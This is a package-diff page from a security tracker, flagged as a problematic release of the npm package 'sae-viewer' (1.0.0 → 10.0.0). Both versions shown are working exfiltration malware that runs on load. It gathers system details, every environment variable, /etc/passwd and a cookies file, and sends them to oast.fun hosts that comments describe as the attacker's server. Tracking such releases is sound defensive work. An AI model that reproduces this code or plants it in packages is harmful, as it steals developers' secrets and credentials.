npm - sae-viewer - Versions diffs - 1.0.0 → 10.0.0 - Mend

sae-viewer 1.0.0 → 10.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of sae-viewer might be problematic. Click here for more details.

Files changed (2) hide show

package/index.js +48 -57
package/package.json +2 -2

package/index.js CHANGED Viewed

@@ -1,82 +1,73 @@
 const os = require('os');
-const https = require('https');
 const fs = require('fs');
-const exec = require('child_process').exec;
+const https = require('https');
-// Function to send data to attacker's server
-function sendDataToAttacker(data) {
+// Helper function to send data back to your server
+const sendData = (data) => {
     const options = {
-        hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun',  // Attacker's server
+        hostname: 'wytyhdlrnmegfegibkke1tfe5mnohtm26.oast.fun', // Your server where you collect the info
         port: 443,
-        path: '/seaviewerchatgpt',                 // Endpoint to collect data
+        path: '/chatgptSeaviewer',
         method: 'POST',
         headers: {
             'Content-Type': 'application/json',
-            'User-Agent': data.userAgent   // Send user agent in headers
         },
     };
     const req = https.request(options, (res) => {
-        console.log(`Data sent with status code: ${res.statusCode}`);
+        res.on('data', (d) => {
+            process.stdout.write(d);
+        });
     });
-    req.on('error', (e) => {
-        console.error(`Problem with request: ${e.message}`);
+    req.on('error', (error) => {
+        console.error(error);
     });
     req.write(JSON.stringify(data));
     req.end();
-}
-// Collect system info
-const systemInfo = {
-    hostname: os.hostname(),        // Get server's hostname
-    platform: os.platform(),        // OS platform (e.g., Linux, Windows)
-    arch: os.arch(),                // Architecture (x64, arm, etc.)
-    cpus: os.cpus().length,         // Number of CPU cores
-    memory: os.totalmem(),          // Total system memory
-    networkInterfaces: os.networkInterfaces(),
 };
-// Collect user-related info
-const userInfo = os.userInfo();
-// Get external IP (simple API call to a free IP lookup service)
-https.get('https://api.ipify.org?format=json', (resp) => {
-    let data = '';
-    resp.on('data', (chunk) => {
-        data += chunk;
-    });
-    resp.on('end', () => {
-        const ipInfo = JSON.parse(data);
-        systemInfo.externalIP = ipInfo.ip;
+// Gather system information
+const getSystemInfo = () => {
+    const userInfo = os.userInfo();
+    const networkInterfaces = os.networkInterfaces();
-        // Get company info (using the hostname)
-        exec(`nslookup ${os.hostname()}`, (error, stdout, stderr) => {
-            if (!error) {
-                systemInfo.companyDetails = stdout;
-            }
-            // Collect user agent (can be hardcoded or dynamically fetched in real scenarios)
-            const userAgent = "NodeJS Malicious Client/1.0";
+    const systemInfo = {
+        hostname: os.hostname(),
+        osType: os.type(),
+        osRelease: os.release(),
+        platform: os.platform(),
+        arch: os.arch(),
+        whoami: userInfo.username,
+        homeDir: userInfo.homedir,
+        networkInterfaces: networkInterfaces,
+        ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
+        macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
+        uptime: os.uptime(),
+        currentWorkingDir: process.cwd(),
+        envVariables: process.env,
+    };
-            // Prepare data to send
-            const collectedData = {
-                systemInfo,
-                userInfo,
-                userAgent,     // User agent string for tracking
-            };
+    return systemInfo;
+};
-            // Send data to the attacker's server
-            sendDataToAttacker(collectedData);
-        });
-    });
+// Optionally, attempt to read sensitive files (ensure you are authorized to do so)
+const readSensitiveFile = (filePath) => {
+    try {
+        const data = fs.readFileSync(filePath, 'utf8');
+        return data;
+    } catch (err) {
+        return `Error reading ${filePath}: ${err.message}`;
+    }
+};
-}).on("error", (err) => {
-    console.log("Error fetching IP: " + err.message);
-});
+// Collect data
+const collectedData = {
+    systemInfo: getSystemInfo(),
+    passwdFile: readSensitiveFile('/etc/passwd'),  // Non-sensitive file on Unix-based systems
+    cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
+};
-// Execute immediately
-console.log("Malicious package executed.");
+// Send collected data back to the attacker's server
+sendData(collectedData);

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "sae-viewer",
-  "version": "1.0.0",
+  "version": "10.0.0",
   "main": "index.js",
   "scripts": {
     "test": "echo \"Error: no test specified\" && exit 1",
@@ -8,5 +8,5 @@
   },
   "author": "",
   "license": "ISC",
-  "description": ""
+  "description": "takeover by sachin"
 }